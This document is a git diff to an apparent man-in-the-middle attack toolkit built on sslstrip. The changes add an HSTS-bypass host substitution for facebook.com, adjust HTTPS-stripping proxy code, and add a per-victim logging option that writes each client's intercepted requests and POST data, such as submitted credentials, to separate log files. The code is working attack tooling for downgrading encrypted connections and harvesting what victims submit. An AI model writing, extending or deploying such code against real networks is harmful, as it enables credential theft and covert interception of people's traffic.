diff --git a/config_files/hsts_bypass.cfg b/config_files/hsts_bypass.cfg index 2b02ed0..06d1ece 100644 --- a/config_files/hsts_bypass.cfg +++ b/config_files/hsts_bypass.cfg @@ -7,4 +7,5 @@ mail.google.com = gmail.google.com accounts.google.se = cuentas.google.se #for facebook -www.facebook.com = social.facebook.com \ No newline at end of file +www.facebook.com = social.facebook.com +facebook.com = social.facebook.com \ No newline at end of file diff --git a/mitmf.py b/mitmf.py index b9d844e..1f8c286 100755 --- a/mitmf.py +++ b/mitmf.py @@ -28,7 +28,7 @@ if __name__ == "__main__": slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") - #slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') + slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") @@ -83,7 +83,7 @@ if __name__ == "__main__": from sslstrip.StrippingProxyHSTS import StrippingProxy from sslstrip.URLMonitorHSTS import URLMonitor - URLMonitor.getInstance().setFaviconSpoofing(args.favicon) + URLMonitor.getInstance().setValues(args.favicon, args.clients) CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) @@ -100,7 +100,7 @@ if __name__ == "__main__": from sslstrip.StrippingProxy import StrippingProxy from sslstrip.URLMonitor import URLMonitor - URLMonitor.getInstance().setFaviconSpoofing(args.favicon) + URLMonitor.getInstance().setValues(args.favicon, args.clients) CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) diff --git a/sslstrip/ClientRequestHSTS.py b/sslstrip/ClientRequestHSTS.py index 26dfaf3..8ebe49f 100644 --- a/sslstrip/ClientRequestHSTS.py +++ b/sslstrip/ClientRequestHSTS.py @@ -78,11 +78,11 @@ class ClientRequest(Request): del headers['if-none-match'] if 'host' in headers: - host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) - logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host)) - headers['host'] = host - headers['securelink'] = '1' - self.setHeader('Host',host) + host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) + logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host)) + headers['host'] = host + headers['securelink'] = '1' + self.setHeader('Host',host) self.plugins.hook() @@ -116,7 +116,12 @@ class ClientRequest(Request): host = self.urlMonitor.URLgetRealHost("%s" % lhost) client = self.getClientIP() path = self.getPathFromUri() - self.content.seek(0, 0) + + try: + self.content.seek(0, 0) + except: + pass + postData = self.content.read() real = self.urlMonitor.real patchDict = self.urlMonitor.patchDict diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index cdef64b..ebea273 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -54,7 +54,12 @@ class ServerConnection(HTTPClient): def sendRequest(self): if self.command == 'GET': - logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])) + message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host']) + if self.urlMonitor.isClientLogging() is True: + self.urlMonitor.writeClientLog(self.client, self.headers, message) + else: + logging.info(message) + self.plugins.hook() self.sendCommand(self.command, self.uri) @@ -71,7 +76,11 @@ class ServerConnection(HTTPClient): elif 'keylog' in self.uri: self.plugins.hook() else: - logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)) + message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData) + if self.urlMonitor.isClientLogging() is True: + self.urlMonitor.writeClientLog(self.client, self.headers, message) + else: + logging.warning(message) self.transport.write(self.postData) def connectionMade(self): @@ -88,6 +97,8 @@ class ServerConnection(HTTPClient): self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): + self.plugins.hook() + if (key.lower() == 'location'): value = self.replaceSecureLinks(value) @@ -100,8 +111,9 @@ class ServerConnection(HTTPClient): if (value.find('gzip') != -1): logging.debug("Response is compressed...") self.isCompressed = True - if (key.lower() == 'strict-transport-security'): - value = 'max-age=0' + + #if (key.lower() == 'strict-transport-security'): + # value = 'max-age=0' elif (key.lower() == 'content-length'): self.contentLength = value @@ -110,8 +122,6 @@ class ServerConnection(HTTPClient): else: self.client.setHeader(key, value) - self.plugins.hook() - def handleEndHeaders(self): if (self.isImageRequest and self.contentLength != None): self.client.setHeader("Content-Length", self.contentLength) diff --git a/sslstrip/ServerConnectionFactory.py b/sslstrip/ServerConnectionFactory.py index 793bdc6..f694fc0 100644 --- a/sslstrip/ServerConnectionFactory.py +++ b/sslstrip/ServerConnectionFactory.py @@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory): logging.debug("Retrying via SSL") self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) else: - self.client.finish() - + try: + self.client.finish() + except: + pass diff --git a/sslstrip/StrippingProxy.py b/sslstrip/StrippingProxy.py index f4c1e89..8a626df 100644 --- a/sslstrip/StrippingProxy.py +++ b/sslstrip/StrippingProxy.py @@ -20,6 +20,7 @@ from twisted.web.http import HTTPChannel from ClientRequest import ClientRequest class StrippingProxy(HTTPChannel): + '''sslstrip is, at heart, a transparent proxy server that does some unusual things. This is the basic proxy server class, where we get callbacks for GET and POST methods. We then proxy these out using HTTP or HTTPS depending on what information we have about diff --git a/sslstrip/URLMonitor.py b/sslstrip/URLMonitor.py index 6d6f803..ebbb871 100644 --- a/sslstrip/URLMonitor.py +++ b/sslstrip/URLMonitor.py @@ -16,7 +16,7 @@ # USA # -import re +import re, os class URLMonitor: @@ -41,6 +41,25 @@ class URLMonitor: return (client,url) in self.strippedURLs + def writeClientLog(self, client, headers, message): + if not os.path.exists("./logs"): + os.makedirs("./logs") + + if (client.getClientIP() + '.log') not in os.listdir("./logs"): + + try: + log_message = "#Log file for %s (%s)\n" % (client.getClientIP(), headers['user-agent']) + except KeyError: + log_message = "#Log file for %s\n" % client.getClientIP() + + log_file = open("./logs/" + client.getClientIP() + ".log", 'a') + log_file.write(log_message + message + "\n") + log_file.close() + else: + log_file = open("./logs/" + client.getClientIP() + ".log", 'a') + log_file.write(message + "\n") + log_file.close() + def getSecurePort(self, client, url): if (client,url) in self.strippedURLs: return self.strippedURLPorts[(client,url)] @@ -69,12 +88,16 @@ class URLMonitor: self.strippedURLs.add((client, url)) self.strippedURLPorts[(client, url)] = int(port) - def setFaviconSpoofing(self, faviconSpoofing): + def setValues(self, faviconSpoofing, clientLogging): self.faviconSpoofing = faviconSpoofing + self.clientLogging = clientLogging def isFaviconSpoofing(self): return self.faviconSpoofing + def isClientLogging(self): + return self.clientLogging + def isSecureFavicon(self, client, url): return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) diff --git a/sslstrip/URLMonitorHSTS.py b/sslstrip/URLMonitorHSTS.py index 35262ce..164da92 100644 --- a/sslstrip/URLMonitorHSTS.py +++ b/sslstrip/URLMonitorHSTS.py @@ -64,14 +64,14 @@ class URLMonitor: #LEO: Sustituir HOST if not self.sustitucion.has_key(host): - lhost = host[:4] - if lhost=="www.": + lhost = host[:4] + if lhost=="www.": self.sustitucion[host] = "w"+host self.real["w"+host] = host - else: + else: self.sustitucion[host] = "web"+host self.real["web"+host] = host - #logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) + logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) url = 'http://' + host + path #logging.debug("LEO stripped URL: %s %s"%(client, url))